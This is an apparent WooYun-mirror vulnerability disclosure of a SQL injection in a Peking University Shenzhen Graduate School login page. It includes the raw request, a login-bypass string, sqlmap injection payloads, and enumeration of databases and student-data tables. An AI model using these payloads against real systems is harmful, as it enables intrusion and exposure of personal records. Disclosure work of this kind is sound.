乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-04: 细节已通知厂商并且等待厂商处理中 2015-12-04: 厂商已经确认,细节仅向厂商公开 2015-12-14: 细节向核心白帽子及相关领域专家公开 2015-12-24: 细节向普通白帽子公开 2016-01-03: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
RT
信息量挺大的
http://ss.pkusz.edu.cn/ 北京大学深圳研究生院信息管理平台
POST /session HTTP/1.1Content-Length: 258Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://ss.pkusz.edu.cnCookie: _fullcalendar_session=BAh7CDoQX2NzcmZfdG9rZW4iMWdlZFdjMWxHNTVIaTAvVGdBK2VKV1hOTUQ0UGlyYURoU0dremZTUE90S0E9Og9zZXNzaW9uX2lkIiVmMGU5NzY5ZjMyNTU2ZjQzZDYzZjdlMDQyOTI0ZDkwYSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiAAY6CkB1c2VkewY7CEY%3D--3f770cdecb7e412a71d3109111cb0f5579c54b03Host: ss.pkusz.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*authenticity_token=gedWc1lG55Hi0/TgA%2beJWXNMD4PiraDhSGkzfSPOtKA%3d&image=xCDC&login=*&password=g00dPa%24%24w0rD&yanzhengma=1
login参数存在注入发现这个就尝试了一下万能密码...admin' or 1=1 or '1'='1 密码随便填 就这么进去了...
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: authenticity_token=gedWc1lG55Hi0/TgA+eJWXNMD4PiraDhSGkzfSPOtKA=&image=xCDC&login=-7215') OR 8985=8985 AND ('arKE'='arKE&password=g00dPa$$w0rD&yanzhengma=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: authenticity_token=gedWc1lG55Hi0/TgA+eJWXNMD4PiraDhSGkzfSPOtKA=&image=xCDC&login=') AND (SELECT * FROM (SELECT(SLEEP(5)))tofu) AND ('OXFj'='OXFj&password=g00dPa$$w0rD&yanzhengma=1---web server operating system: Linux Ubuntu 11.04 (Natty Narwhal)web application technology: Apache 2.2.17back-end DBMS: MySQL 5.0.12current user: 'root@localhost'current database: 'fullcalendarbranch'current user is DBA: Trueavailable databases [13]:[*] atutor[*] canvas_development[*] canvas_production[*] canvas_queue_development[*] canvas_queue_production[*] crmfullcalendar[*] emailer[*] fullcalendarbranch[*] fullcalendarbranch_test[*] information_schema[*] moodle[*] mysql[*] tourism
Database: fullcalendarbranch+----------------------------------+---------+| Table | Entries |+----------------------------------+---------+| evaluation_students_answers | 940161 || courses_stu_reg_infs | 70468 || events | 27150 || course_act_logs | 23556 || student_registers | 18971 || stu_payments | 18535 || register_infos | 13686 || tuitions | 12005 || oce_scores | 11545 || self_words_answers | 7653 || stu_reg_infs | 7559 || stu_work_infs | 7537 || stu_bedrooms | 7137 || water_payments | 7099 || scbb_infos | 7040 || users | 6587 || temp_fees | 5685 || stu_bedroom_xuanfangs | 5503 || reports | 5218 || rcrm_accounts_contacts | 5191 || referrals | 4223 || rcrm_accounts | 4139 || verifies | 3748 || areas | 3525 || student_fees | 3073 || scholarships | 2590 || education_histories | 2373 || news_checks_rcrm_leads | 2322 || oce_tuitions | 2241 || colleges | 2223 || homeworks_students | 2157 || oce_infos | 2130 || lead_users | 1962 || course_cmodules | 1806 || sam_events | 1782 || internships | 1776 || courses | 1631 || event_series | 1616 || bedrooms_standard_payments | 1552 || bedroom_xuanfangs | 1479 || worker_payments | 1427 || logs | 1262 || bedrooms | 1242 || rcrm_leads | 1189 || evaluation_paper_course_cmodules | 1175 || stu_reg_inf_tmodule_teachers | 1162 || work_records | 1124 || university_courses | 1078 || class_cmodules | 1020 || worker_infs | 990 || update_files | 962 || phbs_edpstudents | 917 || lead_users_rcrm_batches | 863 || exc_answers | 833 || event_retunes | 702 || temp_fee_stls | 669 || loan_datas | 644 || teachers | 634 || event_series_staffs | 570 || stu_apply_prizes | 567 || exc_scores | 564 || rcrm_meetings_leads | 544 || courses_teachers | 461 || stu_reg_infs_teams | 420 || roles_users | 405 || staffs | 405 || docus | 403 || oce_tk_scores | 399 || change_bedrooms | 388 || cities | 377 || train_plans | 363 || permissions_roles | 361 || rcrm_accounts_bugs | 357 || classroom_users | 336 || phbs_edpstudent_pays | 334 || course_times | 293 || stu_tmodule_teacher_reals | 287 || apply_excels | 278 || rcrm_campaign_logs | 269 || loans | 268 || countries | 240 || oce_uploadfiles | 240 || contries | 239 || apply_awards | 217 || bnews_checks_rcrm_leads | 200 || cnews_checks_rcrm_leads | 200 || dnews_checks_rcrm_leads | 200 || anews_checks_rcrm_leads | 199 || enews_checks_rcrm_leads | 199 || evaluation_questions | 182 || exc_batch_stus | 180 || tmodule_teachers | 156 || permissions | 145 || anews_checks | 134 || bnews_checks | 134 || cnews_checks | 134 || dnews_checks | 134 || enews_checks | 134 || news_checks | 134 || cmodules | 132 || classrooms | 129 || oce_major_courses | 119 || temp_qianfeis | 114 || staff_bedrooms | 112 || rcrm_leads_trades | 106 || homeworks | 101 || exc_batch_schools | 98 || student_classes | 96 || quales_rcrm_leads | 93 || award_assigns | 92 || tuition_standards | 86 || floors | 79 || messages | 72 || phbs_pcourses | 72 || schema_migrations | 70 || facebooks | 69 || exc_schools | 65 || step_change_bedrooms | 60 || class_teachers | 58 || nations | 58 || oce_courses | 55 || apply_exgraduates | 53 || rcrm_status | 47 || evaluation_question_types | 42 || phbs_contract_pays | 36 || trades | 35 || provinces | 34 || services | 34 || roles | 33 || interns | 32 || courses_student_classes | 30 || standard_payments | 30 || majors | 29 || rmodules | 29 || phbs_contracts | 25 || sam_teams | 24 || depts_users | 23 || exc_batch_teachers | 21 || lead_user_infos | 21 || npositions | 21 || stu_sources | 21 || evaluation_answers | 16 || phbs_companies | 16 || event_categories | 15 || mbatrades | 15 || sam_instruments | 15 || socials | 14 || course_covers | 13 || universities | 13 || choose_bedroom_times | 12 || enterprises | 12 || rcrm_meetings | 12 || award_standards | 11 || depts | 11 || facebooks_copy | 11 || info_ways | 10 || phbs_edpdepts | 10 || techangs | 10 || evaluation_papers | 9 || locations | 9 || rcrm_meetings_users | 9 || evaluates | 8 || exc_questions | 8 || self_words | 8 || stucourses | 8 || notice_types | 7 || notices | 7 || quales | 7 || register_terms | 7 || sm_moduls | 7 || specialties | 7 || wagecategories | 7 || course_objects | 6 || rcrm_batches | 6 || remarks | 6 || studystatus | 6 || buildings | 5 || mbaquales | 5 || oce_majors | 5 || tc_levels | 5 || teams | 5 || tmodules | 5 || user_infos | 5 || evaluation_answer_types | 4 || mentor_students | 4 || phbs_activity_teachers | 4 || phbs_service_types | 4 || projects_staffs | 4 || invoice_nos | 3 || news_types | 3 || phbs_activities | 3 || phbs_service_type_teachers | 3 || registstatus | 3 || stu_informations | 3 || styles | 3 || class_tmodules | 2 || event_series_teachers | 2 || exams_students | 2 || exc_batches | 2 || fires | 2 || projects | 2 || exams | 1 || excels | 1 || mentors | 1 || oce_configs | 1 || statues | 1 |+----------------------------------+---------+
加上是DBA权限,写shell就不好了.求高rank。。。
危害等级:高
漏洞Rank:10
确认时间:2015-12-04 12:15
非常感谢!
暂无
![$388D]2CMXV484QTJ]MJCY9.png](http://wimg.zone.ci/upload/201512/03194124c87fae07c7a4cf2d58a66dec824f59be.png)
